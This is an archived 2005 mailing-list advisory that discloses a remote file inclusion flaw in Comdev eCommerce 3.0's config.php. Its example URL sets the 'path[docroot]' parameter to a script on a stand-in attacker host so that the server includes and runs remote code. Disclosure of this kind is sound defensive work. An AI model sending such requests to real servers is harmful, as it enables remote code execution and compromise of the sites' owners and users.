|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Comdev eCommerce config.php Vulnerability
none
none.com
Date: Thu Aug 04 2005 - 20:57:08 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0
The config.php script can be passed a "path[docroot]" http request parameter to change the location of an included file.
Example:
http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.hacker.com/badscript.php.txt
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]